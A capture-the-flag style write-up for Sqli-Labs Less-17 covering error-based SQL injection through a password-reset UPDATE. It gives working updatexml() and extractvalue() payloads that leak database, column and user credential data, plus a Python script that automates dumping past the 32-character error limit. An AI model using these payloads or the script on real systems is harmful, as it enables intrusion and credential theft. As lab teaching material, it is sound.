Chybeta

Sqli-Labs:Less17-writeup

Sqli-Labs is a good platform for practising SQL injection. Project page: https://github.com/Audi-1/sqli-labs
Test environment for this post: the phpStudy bundle, MySQL version 5.5.53

Less-17 POST-Update Query-Error Based-String

Basics

The three basic data-modification statements.

INSERT

```sql
INSERT INTO table_name ( field1, field2,...fieldN )
VALUES
( value1, value2,...valueN );
```

Example:

```
mysql> desc users;
+----------+-------------+------+-----+---------+----------------+
| Field    | Type        | Null | Key | Default | Extra          |
+----------+-------------+------+-----+---------+----------------+
| id       | int(3)      | NO   | PRI | NULL    | auto_increment |
| username | varchar(20) | NO   |     | NULL    |                |
| password | varchar(20) | NO   |     | NULL    |                |
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.06 sec)
mysql> insert into users(id,username,password) value(0,"chybeta","chybeta");
Query OK, 1 row affected (0.09 sec)
```

MySQL accepts `VALUE` as a synonym for `VALUES`. Inserting 0 into the AUTO_INCREMENT column `id` (under the default sql_mode, i.e. without NO_AUTO_VALUE_ON_ZERO) makes MySQL generate the next id rather than store 0, which is why the same row shows up as id 15 in the UPDATE example below.

UPDATE

```sql
UPDATE table_name SET field1=new-value1, field2=new-value2
[WHERE Clause]
```

Example:

```
mysql> select id,username,password from users where id=15;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 15 | chybeta  | chybeta  |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> update users set username="atebyhc" where id=15;
Query OK, 1 row affected (0.08 sec)
Rows matched: 1  Changed: 1  Warnings: 0
mysql> select id,username,password from users where id=15;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 15 | atebyhc  | chybeta  |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> update users set username="chybeta",password="atebyhc" where id=15;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
mysql> select id,username,password from users where id=15;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 15 | chybeta  | atebyhc  |
+----+----------+----------+
1 row in set (0.00 sec)
```

DELETE

```sql
DELETE FROM table_name [WHERE Clause];
```

Not to be confused with `DROP TABLE table_name;`, which removes the table itself (definition included) rather than rows from it. Without a WHERE clause, DELETE empties the whole table. Skipping the demonstration for now.

Less 17

This level is titled [PASSWORD RESET], so the back-end statement is presumably an UPDATE, roughly:

```sql
update users set password=<new password> where username=<username>;
```

Posting:

```
uname=admin&passwd=chybeta'&submit=Submit
```

produces an error that is echoed back:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
```

The quote that breaks the query is a single quote, so the statement is presumably:

```sql
update users set password='$password' where username='$username';
```

This is consistent with the error: the injected quote closes the password literal early, MySQL then reads the doubled `''` as an escaped quote inside a new literal, and parsing falls over at `admin''`, which is exactly what the message reports.

Next, error-based injection.

updatexml()

```sql
UPDATEXML (XML_document, XPath_string, new_value);
```

First argument: XML_document, a string, the XML document object (called Doc in the referenced note)
Second argument: XPath_string, a string in XPath syntax; look up an XPath tutorial if you are not familiar with it.
Third argument: new_value, a string that replaces the data matched by the XPath.
Purpose: change the value of the nodes in the document that match the XPath.
(From the note "学习笔记 UpdateXml() MYSQL显错注入", i.e. study notes on UpdateXml() MySQL error-based injection)

For injection, the document and the replacement value do not matter. What matters is that when the second argument is not valid XPath, MySQL reports it verbatim in the error `XPATH syntax error: '...'`. `0x7e` (`~`) is not valid XPath, so wrapping the data we want in it guarantees the error and gives us a marker to find it by.

Payload:

```
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#&submit=Submit
```

This yields the database name: security.

But trying to read the data:

```
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1),0x7e),1)#&submit=Submit
```

shows instead:

```
You can't specify target table 'users' for update in FROM clause
```

In other words, MySQL refuses to let a subquery inside an UPDATE (the same holds for DELETE) select from the very table being modified, so the target table cannot be read from a subquery directly.

The way around it is to wrap the query in a derived table and select from that:

```
uname=admin&passwd=chybeta' and updatexml(1,concat(0x7e,(SELECT group_concat(0x23,username,0x3a,password,0x23) FROM (select * from users)tmp),0x7e),1)#&submit=Submit
```

In sql.log this shows up as:

```
UPDATE users SET password = 'chybeta' and updatexml(1,concat(0x7e,(SELECT group_concat(0x23,username,0x3a,password,0x23) FROM (select * from users)tmp),0x7e),1)#' WHERE username='admin'
```

Here `(select * from users)tmp` is a derived table (a subquery in the FROM clause with the alias tmp). MySQL 5.5 materialises it into an internal temporary table, so the outer SELECT...FROM reads from tmp rather than from users and the restriction no longer triggers. Nothing is created in the schema.

Note that the error message shows at most 32 characters of the XPath string (31 of data after the leading `~`), so a long result such as the group_concat above is truncated. To read the rest, page through it with substr()/mid(), or narrow the query with limit.

extractvalue()

extractvalue() takes two arguments, EXTRACTVALUE(xml_frag, xpath_expr), and fails in the same way when xpath_expr is not valid XPath.

Payload:

```
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,database()))#&submit=Submit
```

This yields the database name: security.

Listing the columns:

```
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns where table_name = "users")))#&submit=Submit
```

Dumping usernames and passwords (again through a derived table, for the reason given above):

```
uname=admin&passwd=chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(0x23,username,0x23,password) FROM (select * from users)tmp)))#&submit=Submit
```

For the column-listing payload, the back-end statement as logged is:

```
UPDATE users SET password = 'chybeta' and extractvalue(1,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns where table_name = "users")))#' WHERE username='admin'
```

extractvalue() has the same limit: at most 32 characters of the XPath string are echoed back.
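The updatexml() and extractvalue() sections above both hit the same two problems: the target table has to be read through a derived table, and only 32 characters come back per error. The script below is an added example (mine, not code from the original writeup or from Sqli-Labs) that automates both: it builds the passwd field for either function, windows the result with substr() 31 characters at a time, and parses the leaked window out of the `XPATH syntax error` message. The lab URL, the POST field names (`uname`, `passwd`, `submit`, as used above) and the `fake_less17()` stand-in with its sample rows are assumptions, the stand-in being a constructed offline replacement for the lab that only understands the two expressions it is given.

```python
import re
import urllib.parse
import urllib.request

# updatexml()/extractvalue() echo at most 32 characters of the bad XPath
# string. One of them is our leading '~' marker, so each request leaks 31
# characters of data.
WINDOW = 31

# Expressions used below. USERS_EXPR goes through a derived table so that
# MySQL does not reject reading the UPDATE target (users) in a subquery.
DB_EXPR = "database()"
USERS_EXPR = ("SELECT group_concat(0x23,username,0x3a,password,0x23) "
              "FROM (select * from users)tmp")

# Greedy up to the last quote on the line, so quotes inside the data survive.
ERROR_RE = re.compile(r"XPATH syntax error: '~(.*)'")


def build_passwd(expr, offset, width=WINDOW, func="updatexml"):
    """Value for the 'passwd' POST field.

    substr() places characters offset..offset+width-1 of expr's result behind
    the '~' marker; '#' comments out the rest of the original UPDATE, exactly
    as in the payloads above.
    """
    inner = "concat(0x7e,substr(({expr}),{offset},{width}))".format(
        expr=expr, offset=offset, width=width)
    if func == "extractvalue":
        return "chybeta' and extractvalue(1,%s)#" % inner
    return "chybeta' and updatexml(1,%s,1)#" % inner


def parse_chunk(body):
    """Leaked window from the response body, or None when no XPath error was
    reflected (payload broken, or the expression evaluated to NULL)."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def dump(send, expr, func="updatexml"):
    """Page through expr WINDOW characters per request.

    send(passwd) must return the response body. A window shorter than
    WINDOW (or an empty one) means the end of the data has been reached.
    """
    pieces = []
    offset = 1
    while True:
        chunk = parse_chunk(send(build_passwd(expr, offset, func=func)))
        if not chunk:
            break
        pieces.append(chunk)
        if len(chunk) < WINDOW:
            break
        offset += WINDOW
    return "".join(pieces)


def make_http_sender(url):
    """Sender for a live install; url is assumed to be the Less-17 page,
    e.g. http://127.0.0.1/sqli-labs/Less-17/ (adjust to your setup)."""
    def send(passwd):
        data = urllib.parse.urlencode(
            {"uname": "admin", "passwd": passwd, "submit": "Submit"}).encode()
        with urllib.request.urlopen(url, data=data) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return send


# --- constructed stand-in for the lab, so the script also runs offline ---
# It knows only the two expressions above (constructed sample rows, not the
# lab's real table) and mimics MySQL's 32-character cap on the echoed XPath.
FAKE_RESULTS = {
    DB_EXPR: "security",
    USERS_EXPR: "#Dumb:Dumb#,#Angelina:I-kill-you#,#Dummy:p@ssword#,#secure:crappy#",
}
PAYLOAD_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)\)(?:,1)?\)#$")


def fake_less17(passwd):
    m = PAYLOAD_RE.search(passwd)
    if not m:
        return "<h1>[PASSWORD RESET]</h1>"          # nothing reflected
    expr, offset, width = m.group(1), int(m.group(2)), int(m.group(3))
    value = FAKE_RESULTS[expr]
    xpath = "~" + value[offset - 1:offset - 1 + width]
    return "XPATH syntax error: '%s'" % xpath[:32]


if __name__ == "__main__":
    # Against the real lab: send = make_http_sender("http://127.0.0.1/sqli-labs/Less-17/")
    send = fake_less17
    print("database:", dump(send, DB_EXPR))
    print("users   :", dump(send, USERS_EXPR, func="extractvalue"))
```

Against a real install, swap `fake_less17` for `make_http_sender(...)`; every request the script makes is one UPDATE that fails before modifying anything, because updatexml()/extractvalue() raise the error while the SET expression is being evaluated.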
